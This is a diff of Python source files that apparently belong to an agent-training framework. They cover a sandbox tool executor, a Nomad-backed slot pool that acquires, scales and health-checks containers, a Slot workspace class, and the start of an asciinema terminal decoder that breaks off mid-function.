from ..tools.base import ToolCall, ToolResult
@dataclass
class ExecutionRequest:
"""Request to execute a tool in a slot."""
slot: Slot
tool_name: str
args: Dict[str, Any]
execution_id: str = field(default_factory=lambda: str(uuid.uuid4()))
timeout: float = 30.0
@dataclass
class ExecutionResult:
"""Result from sandbox execution."""
success: bool
output: str = ""
error: str = ""
execution_id: str = ""
slot_id: str = ""
metadata: Dict[str, Any] = field(default_factory=dict)
def to_tool_result(self) -> ToolResult:
"""Convert to ToolResult for agent consumption."""
return ToolResult(
success=self.success,
output=self.output,
error=self.error,
metadata=self.metadata,
uniq_id=self.execution_id,
)
class SandboxExecutor:
"""
HTTP client for executing tools in sandbox containers.
Communicates with sandbox_server.py running inside Nomad allocations.
Supports both single execution and batched parallel execution.
Usage:
executor = SandboxExecutor()
# Single execution
result = await executor.execute(slot, "bash", {"command": "ls"})
# Batch execution
results = await executor.execute_batch([
(slot1, "bash", {"command": "ls"}),
(slot2, "write_file", {"path": "test.txt", "content": "hello"}),
])
"""
def __init__(
self,
timeout: float = 30.0,
max_retries: int = 3,
retry_delay: float = 1.0,
):
self.timeout = aiohttp.ClientTimeout(total=timeout)
self.max_retries = max_retries
self.retry_delay = retry_delay
self._session: Optional[aiohttp.ClientSession] = None
async def _get_session(self) -> aiohttp.ClientSession:
"""Get or create HTTP session."""
if self._session is None or self._session.closed:
self._session = aiohttp.ClientSession(timeout=self.timeout)
return self._session
async def close(self):
"""Close HTTP session."""
if self._session and not self._session.closed:
await self._session.close()
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc_val, exc_tb):
await self.close()
async def execute(
self,
slot: Slot,
tool_name: str,
args: Dict[str, Any],
timeout: Optional[float] = None,
) -> ExecutionResult:
"""
Execute a tool in a slot's workspace.
Args:
slot: Slot to execute in
tool_name: Name of tool (bash, read_file, write_file)
args: Tool arguments
timeout: Optional timeout override
Returns:
ExecutionResult with output or error
"""
execution_id = str(uuid.uuid4())
exec_timeout = timeout or self.timeout.total or 30.0
# Mark slot as executing
original_state = slot.state
try:
if slot.state == SlotState.ACQUIRED:
slot.start_execution(execution_id)
result = await self._send_execute_request(
container_addr=slot.container_addr,
slot_id=slot.slot_id,
tool_name=tool_name,
args=args,
execution_id=execution_id,
timeout=exec_timeout,
)
result.slot_id = slot.slot_id
return result
finally:
# Restore slot state
if slot.state == SlotState.EXECUTING:
slot.end_execution()
async def _send_execute_request(
self,
container_addr: str,
slot_id: str,
tool_name: str,
args: Dict[str, Any],
execution_id: str,
timeout: float,
) -> ExecutionResult:
"""Send execution request to sandbox server with retry logic."""
session = await self._get_session()
url = f"{container_addr}/execute"
payload = {
"slot_id": slot_id,
"tool": tool_name,
"args": args,
"execution_id": execution_id,
"timeout": timeout,
}
last_error = None
for attempt in range(self.max_retries):
try:
async with session.post(url, json=payload) as response:
data = await response.json()
return ExecutionResult(
success=data.get("success", False),
output=data.get("output", ""),
error=data.get("error", ""),
execution_id=data.get("execution_id", execution_id),
metadata=data.get("metadata", {}),
)
except aiohttp.ClientError as e:
last_error = str(e)
if attempt < self.max_retries - 1:
await asyncio.sleep(self.retry_delay * (attempt + 1))
continue
except asyncio.TimeoutError:
last_error = f"Request timed out after {timeout}s"
break
except Exception as e:
last_error = str(e)
break
return ExecutionResult(
success=False,
error=f"Failed after {self.max_retries} attempts: {last_error}",
execution_id=execution_id,
)
async def execute_batch(
self,
requests: List[Tuple[Slot, str, Dict[str, Any]]],
timeout: Optional[float] = None,
) -> List[ExecutionResult]:
"""
Execute multiple tools in parallel across slots.
This is the key optimization - we batch tool calls to maximize
container utilization while agents are waiting for LLM responses.
Args:
requests: List of (slot, tool_name, args) tuples
timeout: Optional timeout override
Returns:
List of ExecutionResults in same order as requests
"""
if not requests:
return []
# Group requests by container address for batch API
by_container: Dict[str, List[Tuple[int, Slot, str, Dict[str, Any], str]]] = {}
for idx, (slot, tool_name, args) in enumerate(requests):
execution_id = str(uuid.uuid4())
container = slot.container_addr
if container not in by_container:
by_container[container] = []
by_container[container].append((idx, slot, tool_name, args, execution_id))
# Mark slots as executing
if slot.state == SlotState.ACQUIRED:
slot.start_execution(execution_id)
# Execute batches in parallel
exec_timeout = timeout or self.timeout.total or 30.0
batch_tasks = []
for container_addr, batch_requests in by_container.items():
task = self._send_batch_request(
container_addr=container_addr,
batch_requests=batch_requests,
timeout=exec_timeout,
)
batch_tasks.append(task)
# Gather all batch results
batch_results = await asyncio.gather(*batch_tasks, return_exceptions=True)
# Collect results in original order
results: List[Optional[ExecutionResult]] = [None] * len(requests)
for batch_result in batch_results:
if isinstance(batch_result, Exception):
# Mark all in this batch as failed
continue
for idx, result in batch_result:
results[idx] = result
# Fill in any missing results
for idx, result in enumerate(results):
if result is None:
slot, tool_name, args = requests[idx]
results[idx] = ExecutionResult(
success=False,
error="Batch execution failed",
slot_id=slot.slot_id,
)
# End execution on all slots
for slot, _, _ in requests:
if slot.state == SlotState.EXECUTING:
slot.end_execution()
return results # type: ignore
async def _send_batch_request(
self,
container_addr: str,
batch_requests: List[Tuple[int, Slot, str, Dict[str, Any], str]],
timeout: float,
) -> List[Tuple[int, ExecutionResult]]:
"""Send batch execution request to a single container."""
session = await self._get_session()
url = f"{container_addr}/batch"
# Build batch payload
payload = [
{
"slot_id": slot.slot_id,
"tool": tool_name,
"args": args,
"execution_id": execution_id,
"timeout": timeout,
}
for _, slot, tool_name, args, execution_id in batch_requests
]
try:
async with session.post(url, json=payload) as response:
data = await response.json()
if not isinstance(data, list):
raise ValueError(f"Expected list response, got {type(data)}")
results = []
for i, (idx, slot, _, _, execution_id) in enumerate(batch_requests):
if i < len(data):
item = data[i]
result = ExecutionResult(
success=item.get("success", False),
output=item.get("output", ""),
error=item.get("error", ""),
execution_id=item.get("execution_id", execution_id),
slot_id=slot.slot_id,
metadata=item.get("metadata", {}),
)
else:
result = ExecutionResult(
success=False,
error="Missing result in batch response",
execution_id=execution_id,
slot_id=slot.slot_id,
)
results.append((idx, result))
return results
except Exception as e:
# Return error for all requests in batch
return [
(idx, ExecutionResult(
success=False,
error=str(e),
execution_id=execution_id,
slot_id=slot.slot_id,
))
for idx, slot, _, _, execution_id in batch_requests
]
async def reset_slot(self, slot: Slot) -> ExecutionResult:
"""
Reset a slot's workspace (delete all files).
Useful when reusing a slot for a new trajectory.
"""
session = await self._get_session()
url = f"{slot.container_addr}/reset"
try:
async with session.post(url, json={"slot_id": slot.slot_id}) as response:
data = await response.json()
return ExecutionResult(
success=data.get("success", False),
output=data.get("output", ""),
error=data.get("error", ""),
slot_id=slot.slot_id,
)
except Exception as e:
return ExecutionResult(
success=False,
error=str(e),
slot_id=slot.slot_id,
)
async def health_check(self, container_addr: str) -> bool:
"""Check if a sandbox container is healthy."""
session = await self._get_session()
url = f"{container_addr}/health"
try:
async with session.get(url) as response:
data = await response.json()
return data.get("status") == "ok"
except Exception:
return False
async def get_container_status(
self,
container_addr: str
) -> Optional[Dict[str, Any]]:
"""Get status info from a sandbox container."""
session = await self._get_session()
url = f"{container_addr}/health"
try:
async with session.get(url) as response:
return await response.json()
except Exception:
return None
# -------------------------------------------------------------------------
# Artifact helpers (optional)
# -------------------------------------------------------------------------
async def _post_json(
self,
url: str,
payload: Dict[str, Any],
timeout: Optional[float] = None,
) -> Dict[str, Any]:
session = await self._get_session()
try:
async with session.post(url, json=payload, timeout=timeout) as response:
data = await response.json()
if isinstance(data, dict):
data.setdefault("http_status", response.status)
return data
return {"success": False, "error": f"Unexpected response type: {type(data)}", "http_status": response.status}
except Exception as e:
return {"success": False, "error": str(e)}
async def read_artifact(
self,
slot: Slot,
path: str,
*,
encoding: str = "text",
max_bytes: Optional[int] = None,
include_sha256: bool = False,
timeout: Optional[float] = None,
) -> Dict[str, Any]:
url = f"{slot.container_addr}/artifacts/read"
payload: Dict[str, Any] = {"slot_id": slot.slot_id, "path": path, "encoding": encoding, "include_sha256": include_sha256}
if max_bytes is not None:
payload["max_bytes"] = max_bytes
return await self._post_json(url, payload, timeout=timeout)
async def list_artifacts(
self,
slot: Slot,
path: str = ".",
*,
recursive: bool = False,
max_entries: Optional[int] = None,
timeout: Optional[float] = None,
) -> Dict[str, Any]:
url = f"{slot.container_addr}/artifacts/list"
payload: Dict[str, Any] = {"slot_id": slot.slot_id, "path": path, "recursive": recursive}
if max_entries is not None:
payload["max_entries"] = max_entries
return await self._post_json(url, payload, timeout=timeout)
async def archive_artifacts(
self,
slot: Slot,
path: str = ".",
*,
archive_format: str = "tar.gz",
max_bytes: Optional[int] = None,
max_entries: Optional[int] = None,
timeout: Optional[float] = None,
) -> Dict[str, Any]:
url = f"{slot.container_addr}/artifacts/archive"
payload: Dict[str, Any] = {"slot_id": slot.slot_id, "path": path, "format": archive_format}
if max_bytes is not None:
payload["max_bytes"] = max_bytes
if max_entries is not None:
payload["max_entries"] = max_entries
return await self._post_json(url, payload, timeout=timeout)

View File

@@ -1,659 +0,0 @@
"""
SlotPool - Manages slots across Nomad allocations.
The SlotPool is the core abstraction for slot-based multiplexing:
- Tracks available/acquired slots across containers
- Handles slot acquisition and release
- Auto-scales Nomad job count based on demand
- Provides batched tool execution
"""
import asyncio
import logging
import os
import subprocess
from dataclasses import dataclass, field
from pathlib import Path
from typing import Any, Dict, List, Optional, Tuple
from ..nomad.client import (
Allocation,
AllocationStatus,
NomadClient,
create_sandbox_job,
)
from .executor import ExecutionResult, SandboxExecutor
from .slot import Slot, SlotState, create_slots_for_allocation
logger = logging.getLogger(__name__)
@dataclass
class SlotPoolConfig:
"""Configuration for SlotPool."""
# Nomad settings
nomad_address: str = "http://localhost:4646"
job_id: str = "atropos-sandbox"
datacenter: str = "dc1"
# Container settings
image: str = "atropos-sandbox:local" # Use :local tag to avoid registry pull
slots_per_container: int = 10
privileged: bool = False
cpu: int = 500 # MHz
memory: int = 512 # MB
# Driver selection: "docker" or "singularity"
driver: str = "docker"
# Path to .sif file for singularity driver (required if driver="singularity")
singularity_image: Optional[str] = None
# Scaling settings
min_containers: int = 1
max_containers: int = 10
# Timeouts
acquire_timeout: float = 30.0 # Seconds between acquire polls (also triggers scale-up attempts)
health_check_interval: float = 30.0 # Seconds between health checks
scale_cooldown: float = 60.0 # Seconds between scale operations
# Job lifecycle
purge_job_on_start: bool = False # Purge any pre-existing job before starting (local dev/training friendly)
# Local Docker image convenience (macOS/Nomad dev mode)
auto_build_local_image: bool = True # If image endswith :local and is missing, build it from the bundled Dockerfile.
dockerfile_path: Optional[str] = None # Override Dockerfile path (default: Hermes-Agent/atropos/Dockerfile).
docker_build_context: Optional[str] = None # Override build context (default: Hermes-Agent/atropos).
class SlotPool:
"""
Manages a pool of slots across Nomad allocations.
The SlotPool:
- Deploys sandbox containers to Nomad
- Tracks slots across all running containers
- Handles slot acquisition/release
- Auto-scales based on demand
- Provides batched execution via SandboxExecutor
Usage:
config = SlotPoolConfig(
nomad_address="http://localhost:4646",
job_id="my-sandbox",
slots_per_container=10,
)
pool = SlotPool(config)
await pool.start()
# Acquire a slot
slot = await pool.acquire()
# Execute tool
result = await pool.execute(slot, "bash", {"command": "ls"})
# Release slot
await pool.release(slot)
# Shutdown
await pool.stop()
"""
def __init__(self, config: Optional[SlotPoolConfig] = None):
self.config = config or SlotPoolConfig()
# Nomad client
self.nomad = NomadClient(address=self.config.nomad_address)
# Sandbox executor for tool execution
self.executor = SandboxExecutor()
# Slot tracking
self._slots: Dict[str, Slot] = {} # slot_key -> Slot
self._available_queue: asyncio.Queue[str] = asyncio.Queue()
self._lock = asyncio.Lock()
self._scale_lock = asyncio.Lock()
# State
self._started = False
self._health_task: Optional[asyncio.Task] = None
self._scale_task: Optional[asyncio.Task] = None
self._last_scale_time = 0.0
def _default_dockerfile_path(self) -> Path:
# Hermes-Agent/atropos/Dockerfile lives next to this module in source checkouts.
return Path(__file__).resolve().parents[1] / "Dockerfile"
def _default_build_context(self) -> Path:
return Path(__file__).resolve().parents[1]
def _docker_image_exists(self, image: str) -> bool:
try:
proc = subprocess.run(
["docker", "image", "inspect", image],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
check=False,
env={**os.environ, "DOCKER_CLI_HINTS": "false"},
)
return proc.returncode == 0
except FileNotFoundError:
return False
def _try_build_local_image(self, image: str) -> None:
dockerfile = Path(self.config.dockerfile_path) if self.config.dockerfile_path else self._default_dockerfile_path()
context = Path(self.config.docker_build_context) if self.config.docker_build_context else self._default_build_context()
if not dockerfile.exists():
raise RuntimeError(
f"Sandbox Dockerfile not found at {dockerfile}. "
"Build the sandbox image manually or set --env.purge_job_on_start false and provide a non-local image."
)
if not context.exists():
raise RuntimeError(f"Docker build context not found at {context}")
# Prefer buildx+--load to ensure the image ends up in the local daemon (required by Nomad's docker driver).
buildx_cmd = [
"docker",
"buildx",
"build",
"--load",
"-t",
image,
"-f",
str(dockerfile),
str(context),
]
proc = subprocess.run(buildx_cmd, check=False, env={**os.environ, "DOCKER_CLI_HINTS": "false"})
if proc.returncode == 0:
return
# Fallback to classic docker build if buildx isn't available.
build_cmd = ["docker", "build", "-t", image, "-f", str(dockerfile), str(context)]
proc2 = subprocess.run(build_cmd, check=False, env={**os.environ, "DOCKER_CLI_HINTS": "false"})
if proc2.returncode != 0:
raise RuntimeError(
f"Failed to build local sandbox image {image}. "
f"Tried: {' '.join(buildx_cmd)} and {' '.join(build_cmd)}"
)
def _ensure_local_image(self) -> None:
image = (self.config.image or "").strip()
if not image.endswith(":local"):
return
if not self.config.auto_build_local_image:
return
if self._docker_image_exists(image):
return
logger.info(f"Local sandbox image {image} not found; building it now...")
self._try_build_local_image(image)
def _slot_key(self, alloc_id: str, slot_id: str) -> str:
"""Generate unique key for a slot."""
return f"{alloc_id}:{slot_id}"
@property
def total_slots(self) -> int:
"""Total number of slots in pool."""
return len(self._slots)
@property
def available_slots(self) -> int:
"""Number of available slots."""
return sum(1 for s in self._slots.values() if s.is_available)
@property
def acquired_slots(self) -> int:
"""Number of acquired slots."""
return sum(1 for s in self._slots.values() if s.is_acquired)
async def start(self) -> None:
"""
Start the slot pool.
- Checks if Nomad is healthy
- Deploys sandbox job if not running
- Discovers existing allocations
- Starts health check background task
"""
if self._started:
return
logger.info(f"Starting SlotPool (job_id={self.config.job_id})")
try:
# Make sure local sandbox images exist before Nomad tries to pull them.
# This is a common footgun in macOS dev mode with :local tags.
self._ensure_local_image()
# Check Nomad health
if not await self.nomad.is_healthy():
raise RuntimeError(f"Nomad is not reachable at {self.config.nomad_address}")
if self.config.purge_job_on_start:
logger.info(f"Purging any existing Nomad job: {self.config.job_id}")
await self.nomad.stop_job(self.config.job_id, purge=True)
# Check if job exists (after optional purge)
job = await self.nomad.get_job(self.config.job_id)
if job is None:
# Deploy new job
logger.info(f"Deploying sandbox job: {self.config.job_id} (driver={self.config.driver})")
job_spec = create_sandbox_job(
job_id=self.config.job_id,
image=self.config.image,
count=self.config.min_containers,
slots_per_container=self.config.slots_per_container,
privileged=self.config.privileged,
cpu=self.config.cpu,
memory=self.config.memory,
datacenter=self.config.datacenter,
driver=self.config.driver,
singularity_image=self.config.singularity_image,
)
result = await self.nomad.submit_job(job_spec)
if "error" in result:
raise RuntimeError(f"Failed to submit job: {result}")
# Wait for allocations to be running (even if the job already existed).
await self._wait_for_healthy_allocations(self.config.min_containers)
# Discover existing allocations and slots
await self._refresh_slots()
# Start health check task
self._health_task = asyncio.create_task(self._health_check_loop())
self._started = True
logger.info(f"SlotPool started: {self.total_slots} slots available")
except Exception:
# Ensure aiohttp sessions are not leaked if we fail to start.
await self.stop(purge_job=False)
raise
async def stop(self, purge_job: bool = False) -> None:
"""
Stop the slot pool.
Args:
purge_job: If True, also stop the Nomad job
"""
logger.info("Stopping SlotPool")
# Cancel health check task
if self._health_task:
self._health_task.cancel()
try:
await self._health_task
except asyncio.CancelledError:
pass
finally:
self._health_task = None
if self._scale_task:
self._scale_task.cancel()
try:
await self._scale_task
except asyncio.CancelledError:
pass
finally:
self._scale_task = None
# Optionally stop the job (do this even if start() never completed).
if purge_job:
logger.info(f"Stopping Nomad job: {self.config.job_id}")
await self.nomad.stop_job(self.config.job_id, purge=True)
# Close connections
await self.executor.close()
await self.nomad.close()
self._started = False
self._slots.clear()
# Clear the queue
while not self._available_queue.empty():
try:
self._available_queue.get_nowait()
except asyncio.QueueEmpty:
break
async def acquire(self, trajectory_id: Optional[str] = None) -> Slot:
"""
Acquire an available slot.
If no slots are available, waits up to acquire_timeout seconds.
If still no slots, attempts to scale up.
Args:
trajectory_id: Optional ID of trajectory acquiring the slot
Returns:
Acquired Slot
Raises:
asyncio.TimeoutError: If no slot becomes available
"""
if not self._started:
raise RuntimeError("SlotPool not started")
while True:
try:
# Try to get an available slot
slot_key = await asyncio.wait_for(
self._available_queue.get(),
timeout=self.config.acquire_timeout,
)
except asyncio.TimeoutError:
# Try to scale up, but keep waiting even if scaling isn't possible.
# In practice, slots may become available shortly (e.g. contention),
# and scaling may be temporarily blocked by Nomad deployments.
await self._try_scale_up()
continue
slot = self._slots.get(slot_key)
if slot is None:
# Slot was removed; discard stale queue entry and retry.
continue
try:
slot.acquire(trajectory_id)
except RuntimeError:
# Slot isn't actually available (e.g. duplicate queue entry); retry.
continue
logger.debug(f"Acquired slot {slot.slot_id} (alloc={slot.alloc_id[:8]})")
return slot
async def release(self, slot: Slot, reset_workspace: bool = False) -> None:
"""
Release a slot back to the pool.
Args:
slot: Slot to release
reset_workspace: If True, clear the workspace files
"""
slot_key = self._slot_key(slot.alloc_id, slot.slot_id)
if slot_key not in self._slots:
logger.warning(f"Releasing unknown slot: {slot_key}")
return
# Optionally reset workspace
if reset_workspace:
await self.executor.reset_slot(slot)
slot.release()
await self._available_queue.put(slot_key)
logger.debug(f"Released slot {slot.slot_id}")
async def execute(
self,
slot: Slot,
tool_name: str,
args: Dict[str, Any],
timeout: Optional[float] = None,
) -> ExecutionResult:
"""
Execute a tool in a slot's workspace.
Args:
slot: Slot to execute in
tool_name: Name of tool (bash, read_file, write_file)
args: Tool arguments
timeout: Optional timeout override
Returns:
ExecutionResult
"""
return await self.executor.execute(slot, tool_name, args, timeout)
async def execute_batch(
self,
requests: List[Tuple[Slot, str, Dict[str, Any]]],
timeout: Optional[float] = None,
) -> List[ExecutionResult]:
"""
Execute multiple tools in parallel.
This is the key optimization - batch execution across multiple slots
maximizes container utilization.
Args:
requests: List of (slot, tool_name, args) tuples
timeout: Optional timeout override
Returns:
List of ExecutionResults in same order
"""
return await self.executor.execute_batch(requests, timeout)
async def _refresh_slots(self) -> None:
"""Refresh slot inventory from Nomad allocations."""
async with self._lock:
allocs = await self.nomad.get_job_allocations(self.config.job_id)
# Track which slots we've seen
seen_keys = set()
for alloc in allocs:
if alloc.status != AllocationStatus.RUNNING:
continue
if not alloc.http_address:
continue
# Check container health
healthy = await self.executor.health_check(alloc.http_address)
if not healthy:
continue
# Create slots for this allocation
for i in range(self.config.slots_per_container):
slot_id = f"slot_{i}"
slot_key = self._slot_key(alloc.id, slot_id)
seen_keys.add(slot_key)
if slot_key not in self._slots:
# New slot
slot = Slot(
slot_id=slot_id,
alloc_id=alloc.id,
container_addr=alloc.http_address,
)
self._slots[slot_key] = slot
await self._available_queue.put(slot_key)
logger.debug(f"Added slot: {slot_key}")
# Remove slots from dead allocations
for slot_key in list(self._slots.keys()):
if slot_key not in seen_keys:
slot = self._slots.pop(slot_key)
logger.debug(f"Removed slot: {slot_key}")
async def _wait_for_healthy_allocations(
self,
min_count: int,
timeout: float = 120.0
) -> None:
"""Wait for allocations to become healthy."""
import time
start = time.time()
def _summarize_alloc_detail(detail: Dict[str, Any]) -> str:
task_states = detail.get("TaskStates") or {}
parts: List[str] = []
if isinstance(task_states, dict):
for task_name, st in task_states.items():
events = (st or {}).get("Events") or []
if isinstance(events, list) and events:
# Include a few recent events; the latest can be a generic restart message
# while the true root cause is slightly earlier (e.g. image pull failure).
recent = events[-3:]
msgs: List[str] = []
for ev in recent:
desc = ev.get("DisplayMessage") or ev.get("Message") or ev.get("Type") or ""
if desc:
msgs.append(desc)
if msgs:
parts.append(f"{task_name}: " + " | ".join(msgs))
return "; ".join(parts)
def _alloc_events_lower(detail: Dict[str, Any]) -> str:
task_states = detail.get("TaskStates") or {}
texts: List[str] = []
if isinstance(task_states, dict):
for _task_name, st in task_states.items():
events = (st or {}).get("Events") or []
if isinstance(events, list):
for ev in events[-10:]:
desc = ev.get("DisplayMessage") or ev.get("Message") or ev.get("Type") or ""
if desc:
texts.append(desc)
return " ".join(texts).lower()
while time.time() - start < timeout:
allocs = await self.nomad.get_job_allocations(self.config.job_id)
healthy_count = 0
for alloc in allocs:
if alloc.status == AllocationStatus.RUNNING and alloc.http_address:
if await self.executor.health_check(alloc.http_address):
healthy_count += 1
# Fast-fail on obvious driver/image errors to avoid waiting out the full timeout.
if alloc.id:
detail = await self.nomad.get_allocation(alloc.id)
if isinstance(detail, dict):
summary = _summarize_alloc_detail(detail)
lowered = _alloc_events_lower(detail) or summary.lower()
if "failed to pull" in lowered or "pull access denied" in lowered:
raise RuntimeError(
"Nomad allocation failed to start due to a Docker image pull error. "
f"Allocation {alloc.id[:8]}: {summary}\n"
"If you're using a local image tag (e.g. `atropos-sandbox:local`) on macOS, "
"make sure the image is loaded into Docker, e.g.:\n"
" docker buildx build --load -t atropos-sandbox:local -f Hermes-Agent/atropos/Dockerfile Hermes-Agent/atropos"
)
if "exceeded allowed attempts" in lowered:
raise RuntimeError(
"Nomad allocation is crash-looping and has entered restart backoff. "
f"Allocation {alloc.id[:8]}: {summary}\n"
"Inspect logs with:\n"
f" nomad alloc logs -stderr -task sandbox-server {alloc.id}\n"
"Common causes include: missing local Docker image tag, container entrypoint error, "
"or sandbox-server startup failure."
)
if healthy_count >= min_count:
return
await asyncio.sleep(2.0)
# Timed out: include allocation status detail to help debugging.
allocs = await self.nomad.get_job_allocations(self.config.job_id)
alloc_lines: List[str] = []
for alloc in allocs[:10]:
addr = alloc.http_address or "-"
line = f"{alloc.id[:8]} status={alloc.status.value} http={addr}"
detail = await self.nomad.get_allocation(alloc.id)
if isinstance(detail, dict):
summary = _summarize_alloc_detail(detail)
if summary:
line += f" detail={summary}"
alloc_lines.append(line)
hint = (
"Timed out waiting for healthy sandbox allocations.\n"
f"Job: {self.config.job_id}, desired_healthy: {min_count}\n"
"Allocations:\n - " + "\n - ".join(alloc_lines)
)
raise RuntimeError(hint)
async def _try_scale_up(self) -> bool:
"""Attempt to scale up the job."""
import time
async with self._scale_lock:
# Check cooldown
if time.time() - self._last_scale_time < self.config.scale_cooldown:
return False
# Check max containers
status = await self.nomad.get_job_status(self.config.job_id)
if status is None:
return False
current_count = status.count
if current_count >= self.config.max_containers:
logger.warning(f"Cannot scale up: already at max ({self.config.max_containers})")
return False
# Scale up
new_count = min(current_count + 1, self.config.max_containers)
logger.info(f"Scaling up from {current_count} to {new_count} containers")
scale_resp = await self.nomad.scale_job(
self.config.job_id,
count=new_count,
task_group="sandbox",
)
# Nomad may return non-JSON errors (e.g. plain text) with a status field.
if isinstance(scale_resp, dict) and scale_resp.get("status", 200) >= 400:
logger.warning(f"Scale request rejected: {scale_resp}")
self._last_scale_time = time.time()
return False
self._last_scale_time = time.time()
# Wait for new allocation in the background so contended acquires can still
# make progress (e.g. by grabbing slots released by other trajectories).
if self._scale_task is None or self._scale_task.done():
self._scale_task = asyncio.create_task(self._wait_for_scale(new_count))
return True
async def _wait_for_scale(self, desired_count: int) -> None:
try:
await self._wait_for_healthy_allocations(desired_count, timeout=60.0)
await self._refresh_slots()
except asyncio.CancelledError:
raise
except Exception as e:
logger.error(f"Failed to scale up: {e}")
async def _health_check_loop(self) -> None:
"""Background task to monitor container health."""
while True:
try:
await asyncio.sleep(self.config.health_check_interval)
await self._refresh_slots()
except asyncio.CancelledError:
break
except Exception as e:
logger.error(f"Health check error: {e}")
def get_stats(self) -> Dict[str, Any]:
"""Get pool statistics."""
slots_by_state = {}
for slot in self._slots.values():
state = slot.state.value
slots_by_state[state] = slots_by_state.get(state, 0) + 1
container_count = len({s.alloc_id for s in self._slots.values()}) if self._slots else 0
return {
"total_slots": self.total_slots,
"available_slots": self.available_slots,
"acquired_slots": self.acquired_slots,
"containers": container_count,
"slots_by_state": slots_by_state,
"started": self._started,
}

View File

@@ -1,159 +0,0 @@
"""
Slot abstraction for atropos-agent.
A Slot represents an isolated workspace for a single agent trajectory.
Slots are hosted on Nomad allocations and provide workspace isolation
via filesystem directories.
"""
from dataclasses import dataclass, field
from enum import Enum
from typing import Any, Dict, Optional
import uuid
class SlotState(Enum):
"""State of a slot in the pool."""
AVAILABLE = "available" # Ready to be acquired
ACQUIRED = "acquired" # Assigned to a trajectory
EXECUTING = "executing" # Currently executing a tool
RELEASING = "releasing" # Being released back to pool
ERROR = "error" # In error state
@dataclass
class Slot:
"""
An isolated workspace for a single agent trajectory.
Slots are the unit of scheduling - each trajectory runs in its own slot,
with an isolated workspace directory. Multiple slots share a container.
Attributes:
slot_id: Unique identifier for this slot (e.g., "slot_0")
alloc_id: Nomad allocation ID hosting this slot
container_addr: HTTP address of the sandbox server (e.g., "http://10.0.0.1:8080")
workspace_dir: Path to workspace in container (e.g., "/data/slot_0")
state: Current state of the slot
trajectory_id: ID of trajectory currently using this slot (if acquired)
metadata: Additional metadata
"""
slot_id: str
alloc_id: str
container_addr: str
workspace_dir: str = ""
state: SlotState = SlotState.AVAILABLE
trajectory_id: Optional[str] = None
metadata: Dict[str, Any] = field(default_factory=dict)
def __post_init__(self):
"""Set default workspace_dir if not provided."""
if not self.workspace_dir:
self.workspace_dir = f"/data/{self.slot_id}"
@property
def is_available(self) -> bool:
"""Check if slot is available for acquisition."""
return self.state == SlotState.AVAILABLE
@property
def is_acquired(self) -> bool:
"""Check if slot is currently acquired."""
return self.state in (SlotState.ACQUIRED, SlotState.EXECUTING)
def acquire(self, trajectory_id: Optional[str] = None) -> None:
"""
Mark slot as acquired by a trajectory.
Args:
trajectory_id: Optional ID of acquiring trajectory
"""
if not self.is_available:
raise RuntimeError(f"Cannot acquire slot {self.slot_id}: state is {self.state}")
self.state = SlotState.ACQUIRED
self.trajectory_id = trajectory_id or str(uuid.uuid4())
def start_execution(self, execution_id: Optional[str] = None) -> None:
"""Mark slot as executing."""
if self.state != SlotState.ACQUIRED:
raise RuntimeError(f"Cannot start execution on slot {self.slot_id}: state is {self.state}")
self.state = SlotState.EXECUTING
if execution_id:
self.metadata["current_execution_id"] = execution_id
def end_execution(self) -> None:
"""Mark execution as complete, return to acquired state."""
if self.state != SlotState.EXECUTING:
raise RuntimeError(f"Cannot end execution on slot {self.slot_id}: state is {self.state}")
self.state = SlotState.ACQUIRED
self.metadata.pop("current_execution_id", None)
def release(self) -> None:
"""Release slot back to available state."""
self.state = SlotState.AVAILABLE
self.trajectory_id = None
self.metadata.pop("current_execution_id", None)
def mark_error(self, error: str) -> None:
"""Mark slot as in error state."""
self.state = SlotState.ERROR
self.metadata["error"] = error
def to_dict(self) -> Dict[str, Any]:
"""Convert to dictionary for serialization."""
return {
"slot_id": self.slot_id,
"alloc_id": self.alloc_id,
"container_addr": self.container_addr,
"workspace_dir": self.workspace_dir,
"state": self.state.value,
"trajectory_id": self.trajectory_id,
"metadata": self.metadata,
}
@classmethod
def from_dict(cls, data: Dict[str, Any]) -> "Slot":
"""Create from dictionary."""
return cls(
slot_id=data["slot_id"],
alloc_id=data["alloc_id"],
container_addr=data["container_addr"],
workspace_dir=data.get("workspace_dir", ""),
state=SlotState(data.get("state", "available")),
trajectory_id=data.get("trajectory_id"),
metadata=data.get("metadata", {}),
)
def __repr__(self) -> str:
return f"Slot({self.slot_id}, state={self.state.value}, alloc={self.alloc_id[:8]}...)"
def create_slots_for_allocation(
alloc_id: str,
container_addr: str,
num_slots: int = 10,
) -> list["Slot"]:
"""
Create slots for a Nomad allocation.
Args:
alloc_id: Nomad allocation ID
container_addr: HTTP address of sandbox server
num_slots: Number of slots to create
Returns:
List of Slot objects
"""
slots = []
for i in range(num_slots):
slot_id = f"slot_{i}"
slots.append(Slot(
slot_id=slot_id,
alloc_id=alloc_id,
container_addr=container_addr,
workspace_dir=f"/data/{slot_id}",
))
return slots

View File

@@ -1,2 +0,0 @@
"""Terminal helpers for stateful sandbox interactions."""

View File

@@ -1,115 +0,0 @@
from __future__ import annotations
import json
from typing import Any
import pyte
class AsciinemaStreamDecoder:
def __init__(self, *, default_width: int = 80, default_height: int = 24) -> None:
self._default_width = max(1, int(default_width))
self._default_height = max(1, int(default_height))
self._buffer = ""
self._has_header = False
self.width = self._default_width
self.height = self._default_height
self._screen = pyte.Screen(self.width, self.height)
self._stream = pyte.Stream(self._screen)
def reset(self) -> None:
self._buffer = ""
self._has_header = False
self.width = self._default_width
self.height = self._default_height
self._screen = pyte.Screen(self.width, self.height)
self._stream = pyte.Stream(self._screen)
def feed(self, chunk: str | bytes) -> None:
if not chunk:
return
if isinstance(chunk, bytes):
chunk = chunk.decode("utf-8", errors="replace")
self._buffer += chunk
while True:
line, sep, rest = self._buffer.partition("\n")
if not sep:
break
self._buffer = rest
line = line.strip()
if not line:
continue
parsed = self._parse_json_line(line)
if parsed is None:
continue
if not self._has_header:
if isinstance(parsed, dict):
self._init_from_header(parsed)
continue
if isinstance(parsed, list):
self._has_header = True
self._apply_event(parsed)
continue
continue
if isinstance(parsed, list):
self._apply_event(parsed)
def render(self) -> str:
return "\n".join(self._screen.display)
def _parse_json_line(self, line: str) -> Any | None:
try:
return json.loads(line)
except json.JSONDecodeError:
return None
def _init_from_header(self, header: dict[str, Any]) -> None:
width = _coerce_int(
header.get("width") or header.get("columns") or header.get("cols"),
self._default_width,
)
height = _coerce_int(
header.get("height") or header.get("rows") or header.get("lines"),
